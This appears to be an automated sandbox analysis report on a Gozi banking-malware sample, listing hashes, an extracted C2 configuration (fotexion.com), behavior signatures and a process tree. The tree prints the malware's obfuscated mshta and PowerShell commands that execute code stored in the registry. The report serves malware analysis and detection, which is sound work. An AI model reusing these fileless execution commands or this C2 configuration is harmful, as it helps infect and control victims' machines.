Analysis
-
max time kernel
151s -
max time network
157s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
12-10-2023 13:28
Static task
static1
Behavioral task
behavioral1
Sample
Azienda.url
Resource
win7-20230831-en
General
-
Target
Azienda.url
-
Size
193B
-
MD5
385b2d1cc0f48c9b113009619258b210
-
SHA1
2a956120277957bf6b11ec05568e148cb1c0bc7c
-
SHA256
589deb6665a90960cfbe3db62f3477f9a2087a2b2eb03d1a19ea69374a9eb34e
-
SHA512
a82d7f78c72d8ba1849473a7ac2536e1c332289fbdf11c6ea6f5de6f182208871a4ccb59a0f5facccdd6d0c78e9c9e10dcfe4aa067426fe0ce69358477364e18
Malware Config
Extracted
gozi
Extracted
gozi
5050
fotexion.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 19 4492 rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exerundll32.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000\Control Panel\International\Geo\Nation rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 4492 rundll32.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process target process PID 5000 set thread context of 3164 5000 powershell.exe Explorer.EXE PID 3164 set thread context of 3808 3164 Explorer.EXE RuntimeBroker.exe PID 3164 set thread context of 3184 3164 Explorer.EXE RuntimeBroker.exe PID 3164 set thread context of 4732 3164 Explorer.EXE RuntimeBroker.exe PID 3164 set thread context of 4512 3164 Explorer.EXE RuntimeBroker.exe PID 3164 set thread context of 4148 3164 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1141987721-3945596982-3297311814-1000_Classes\Local Settings rundll32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepowershell.exeExplorer.EXEpid process 4492 rundll32.exe 4492 rundll32.exe 5000 powershell.exe 5000 powershell.exe 5000 powershell.exe 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3164 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
powershell.exeExplorer.EXEpid process 5000 powershell.exe 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE 3164 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exeExplorer.EXERuntimeBroker.exedescription pid process Token: SeDebugPrivilege 5000 powershell.exe Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3808 RuntimeBroker.exe Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3808 RuntimeBroker.exe Token: SeShutdownPrivilege 3164 Explorer.EXE Token: SeCreatePagefilePrivilege 3164 Explorer.EXE Token: SeShutdownPrivilege 3808 RuntimeBroker.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 5088 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3164 Explorer.EXE -
Suspicious use of WriteProcessMemory 43 IoCs
Processes:
rundll32.execontrol.exerundll32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEdescription pid process target process PID 5088 wrote to memory of 1012 5088 rundll32.exe control.exe PID 5088 wrote to memory of 1012 5088 rundll32.exe control.exe PID 1012 wrote to memory of 4812 1012 control.exe rundll32.exe PID 1012 wrote to memory of 4812 1012 control.exe rundll32.exe PID 4812 wrote to memory of 4492 4812 rundll32.exe rundll32.exe PID 4812 wrote to memory of 4492 4812 rundll32.exe rundll32.exe PID 4812 wrote to memory of 4492 4812 rundll32.exe rundll32.exe PID 4496 wrote to memory of 5000 4496 mshta.exe powershell.exe PID 4496 wrote to memory of 5000 4496 mshta.exe powershell.exe PID 5000 wrote to memory of 1348 5000 powershell.exe csc.exe PID 5000 wrote to memory of 1348 5000 powershell.exe csc.exe PID 1348 wrote to memory of 3620 1348 csc.exe cvtres.exe PID 1348 wrote to memory of 3620 1348 csc.exe cvtres.exe PID 5000 wrote to memory of 4204 5000 powershell.exe csc.exe PID 5000 wrote to memory of 4204 5000 powershell.exe csc.exe PID 4204 wrote to memory of 3172 4204 csc.exe cvtres.exe PID 4204 wrote to memory of 3172 4204 csc.exe cvtres.exe PID 5000 wrote to memory of 3164 5000 powershell.exe Explorer.EXE PID 5000 wrote to memory of 3164 5000 powershell.exe Explorer.EXE PID 5000 wrote to memory of 3164 5000 powershell.exe Explorer.EXE PID 5000 wrote to memory of 3164 5000 powershell.exe Explorer.EXE PID 3164 wrote to memory of 3808 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3808 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3808 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3808 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3184 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3184 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3184 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 3184 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4732 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4732 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4732 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4732 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4512 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4512 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4512 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4512 3164 Explorer.EXE RuntimeBroker.exe PID 3164 wrote to memory of 4148 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 4148 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 4148 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 4148 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 4148 3164 Explorer.EXE cmd.exe PID 3164 wrote to memory of 4148 3164 Explorer.EXE cmd.exe
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3808
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4732
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Azienda.url1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5088 -
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FXXN8G02\modulo[1].cpl",2⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FXXN8G02\modulo[1].cpl",3⤵
- Suspicious use of WriteProcessMemory
PID:4812 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\FXXN8G02\modulo[1].cpl",4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4492
-
-
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3184
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>T4ap='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(T4ap).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9\\\MemoryLocal'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rtlrwrhkst -value gp; new-alias -name kqliakqxc -value iex; kqliakqxc ([System.Text.Encoding]::ASCII.GetString((rtlrwrhkst "HKCU:Software\AppDataLow\Software\Microsoft\D75FCFBE-4A7B-21B2-0CFB-1EE5005F32E9").ProcessActive))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lqqzzf2j\lqqzzf2j.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:1348 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5FDE.tmp" "c:\Users\Admin\AppData\Local\Temp\lqqzzf2j\CSC49C548F4730148D6B4580ED63A7C8B1.TMP"5⤵PID:3620
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k4aegzgl\k4aegzgl.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61D2.tmp" "c:\Users\Admin\AppData\Local\Temp\k4aegzgl\CSC72111829734047B790C7818329CB6427.TMP"5⤵PID:3172
-
-
-
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:4148
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4512
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
Filesize
1KB
MD5fc4ce9255b734f9231a448b243b97b90
SHA13f7333fbdeec2ed377f17bcc70a1792650c6273f
SHA25600c0d6a131087f1b2338b0ffdd1117224b8171245b076d60edd157190df6e702
SHA5129d8b6c913881791a82f21319300d57c7d8067ebc438345f0967ef4d748db4976a5479c4ecd4e458eebf079a1830f6bb3896c6e568dffa0eaf5478353d3ff73f6
-
Filesize
1KB
MD51f3930838ec2d1272f7d919c7a153149
SHA118c28d8150b0601bb9510396b5b8f9ab60220e53
SHA256a7b79227442107fb71f257d34e11b2e4913d3dc642a5fe53bbba6ed185c38bb6
SHA5129f9ad17ce8db7128b6b78e75f3e984c965ec77da794be66c64f69d1b138621802859fe308f8bc9970a9f12bc42b97e587363b26ecbc81f7848befe51217216ea
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD57667fe044da68bc602b83694177db187
SHA1d1eef0bece87f62ff36becdc020eb8d488f94913
SHA256af3a24600334146f29d59feb9ee4ddf9d9b245852ad73c3c24daeb60b22cb400
SHA512ea130fb6eb1a797a348f5e539ebb6a1761dec5d5c6cee54b7bf1fef447b4ae8fb987631995611daa5aedcb1c064dd0c45f23e57bcacb5ba99a4b7bda7a5085ec
-
Filesize
3KB
MD5d56bba38ffc3897a7081768feb6a38da
SHA17154716d7d0475dc5a23e5cc36691a8f69eaebb9
SHA25661afdbfd036ee2a9422f6e5f8e3b643a3450b93fb2f974528ae18990135ba229
SHA51217c038d8c32f5ceb2af1cfe7f883d0655873cedac3570b728eece4d537d4df2c7f8c46bdea32a699756dbdb18e48c448ac0ca79d774cdb69212ba9cd7c1512c3
-
Filesize
652B
MD50ae07095ccb28956be50bf402e000db8
SHA10d01d61dc10b1e3a3b6dbfb948234440b9c7a759
SHA256fc475b11197e026833792d614be4156eef84f1c2b22bbdc581565a15d2ab26d2
SHA512726bd6b80dd34e469da619a8966db75086c0dcd1aaa1f1b61672b185b4e1a1cf7360cca0ecfafe1c3a400a88ae1bcfb347c8f2d6c06b9b465099ff835accc4e3
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD59f5b6c6f7e9d2673e65069cfe9ae8e18
SHA1c657bd95b776ec4c1397041a9eb9973d20c6a9e6
SHA25693be914832d547aa13b5be5ecfd72453d2ffeebe85d3a935925df26f719e33da
SHA512125bbb04f25d386c0ab07fc4241d489681594c87d300a5d083b0cbc1e2b66f9de578e8e21af12da4e449930bf36f442a952871aee4af181f537af278a4f51148
-
Filesize
652B
MD5818e2778d565285d66dc20d9b113d5a4
SHA149751408f8d7d411545e83e2af816be6e3f5f8ca
SHA256290fb0902a1857a67638aadaa33086856bec6c5bb3e8c41ccaeead13429d16e3
SHA51294509f8efb971792e5fb04d142ec0bef459b570056239b3db5aea9cd9a904d5dfadbf991d321419be520a399c50ab2bf28a6321483b5c4e0cbaa9b78dc221d53
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD5a512c6dea2b3f8b01d8e6e74065d7435
SHA1d50856d11331ab14f1038d7e6b880c3c2df252e1
SHA256c21b0851ff049b33034c9d5901231eedf3528170fe8aa0b81590a204b002af49
SHA512d9a72cfec34c05de5ef7d494e2706086a1a9183805eea46b2ca52b6e755ae177f57706551e5470880306860e23831376a6e0a45c030a54e39b9c0db379835914